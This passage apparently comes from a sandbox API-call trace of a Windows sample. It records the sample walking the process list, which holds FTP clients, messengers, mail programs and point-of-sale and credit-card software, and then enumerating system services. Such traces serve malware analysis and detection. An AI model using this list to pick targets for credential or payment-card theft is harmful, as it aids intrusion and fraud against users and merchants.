th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0179.729] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0179.729] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0179.729] lstrlenW (lpString="try.exe") returned 7 [0179.729] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0179.730] lstrlenW (lpString="statuteide.exe") returned 14 [0179.730] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0179.731] lstrlenW (lpString="invite.exe") returned 10 [0179.731] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0179.731] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0179.732] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0179.733] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0179.734] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0179.734] lstrlenW (lpString="modules_recommend.exe") returned 21 [0179.734] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0179.735] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0179.735] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.736] lstrlenW (lpString="svchost.exe") returned 11 [0179.736] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0179.737] lstrlenW (lpString="3dftp.exe") returned 9 [0179.737] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0179.737] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0179.737] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0179.738] lstrlenW (lpString="alftp.exe") returned 9 [0179.738] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0179.739] lstrlenW (lpString="barca.exe") returned 9 [0179.739] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0179.740] lstrlenW (lpString="bitkinex.exe") returned 12 [0179.740] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0179.741] lstrlenW (lpString="coreftp.exe") returned 11 [0179.742] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0179.743] lstrlenW (lpString="far.exe") returned 7 [0179.743] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0179.744] lstrlenW (lpString="filezilla.exe") returned 13 [0179.744] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0180.138] lstrlenW (lpString="flashfxp.exe") returned 12 [0180.138] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0180.140] lstrlenW (lpString="fling.exe") returned 9 [0180.140] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0180.141] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0180.141] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0180.142] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0180.142] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0180.144] lstrlenW (lpString="icq.exe") returned 7 [0180.144] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0180.145] lstrlenW (lpString="leechftp.exe") returned 12 [0180.145] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0180.146] lstrlenW (lpString="ncftp.exe") returned 9 [0180.146] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0180.147] lstrlenW (lpString="notepad.exe") returned 11 [0180.147] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0180.148] lstrlenW (lpString="operamail.exe") returned 13 [0180.149] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0180.150] lstrlenW (lpString="pidgin.exe") returned 10 [0180.150] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0180.151] lstrlenW (lpString="scriptftp.exe") returned 13 [0180.151] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0180.152] lstrlenW (lpString="skype.exe") returned 9 [0180.152] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0180.153] lstrlenW (lpString="smartftp.exe") returned 12 [0180.153] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0180.154] lstrlenW (lpString="thunderbird.exe") returned 15 [0180.155] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0180.156] lstrlenW (lpString="totalcmd.exe") returned 12 [0180.156] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0180.157] lstrlenW (lpString="trillian.exe") returned 12 [0180.157] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0180.158] lstrlenW (lpString="webdrive.exe") returned 12 [0180.158] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0180.159] lstrlenW (lpString="whatsapp.exe") returned 12 [0180.159] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0180.160] lstrlenW (lpString="winscp.exe") returned 10 [0180.160] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0180.161] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0180.161] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0180.162] lstrlenW (lpString="active-charge.exe") returned 17 [0180.162] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0180.163] lstrlenW (lpString="accupos.exe") returned 11 [0180.163] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0180.163] lstrlenW (lpString="afr38.exe") returned 9 [0180.164] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0180.164] lstrlenW (lpString="aldelo.exe") returned 10 [0180.164] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0180.165] lstrlenW (lpString="ccv_server.exe") returned 14 [0180.165] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0180.166] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0180.166] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0180.167] lstrlenW (lpString="creditservice.exe") returned 17 [0180.167] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0180.167] lstrlenW (lpString="edcsvr.exe") returned 10 [0180.168] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0180.168] lstrlenW (lpString="fpos.exe") returned 8 [0180.168] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0180.169] lstrlenW (lpString="isspos.exe") returned 10 [0180.169] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0180.170] lstrlenW (lpString="mxslipstream.exe") returned 16 [0180.170] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0180.171] lstrlenW (lpString="omnipos.exe") returned 11 [0180.171] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0180.172] lstrlenW (lpString="spcwin.exe") returned 10 [0180.172] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0180.172] lstrlenW (lpString="spgagentservice.exe") returned 19 [0180.172] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0180.173] lstrlenW (lpString="utg2.exe") returned 8 [0180.173] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0180.174] lstrlenW (lpString="lb_community.exe") returned 16 [0180.174] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0180.174] lstrlenW (lpString="miniature.exe") returned 13 [0180.174] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0180.175] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0180.175] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0180.176] lstrlenW (lpString="operation-environments.exe") returned 26 [0180.176] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.176] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0180.177] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.177] lstrlenW (lpString="taskhostw.exe") returned 13 [0180.177] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0180.178] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0180.178] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0180.179] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0180.179] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0180.179] lstrlenW (lpString="conhost.exe") returned 11 [0180.179] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.180] lstrlenW (lpString="sppsvc.exe") returned 10 [0180.180] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0180.181] lstrlenW (lpString="dllhost.exe") returned 11 [0180.181] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0180.181] lstrlenW (lpString="wdgmug.exe") returned 10 [0180.181] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0180.182] lstrlenW (lpString="cmd.exe") returned 7 [0180.182] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0180.183] lstrlenW (lpString="conhost.exe") returned 11 [0180.183] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0180.183] lstrlenW (lpString="sc.exe") returned 6 [0180.183] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0180.184] lstrlenW (lpString="conhost.exe") returned 11 [0180.184] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0180.354] lstrlenW (lpString="WMIADAP.exe") returned 11 [0180.354] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0180.355] CloseHandle (hObject=0x374) returned 1 [0180.355] Sleep (dwMilliseconds=0x1f4) [0180.863] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ed68 [0180.865] EnumServicesStatusExW (in: hSCManager=0x74ed68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0180.867] GetLastError () returned 0xea [0180.867] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x772a60 [0180.867] EnumServicesStatusExW (in: hSCManager=0x74ed68, InfoLevel=0x0, 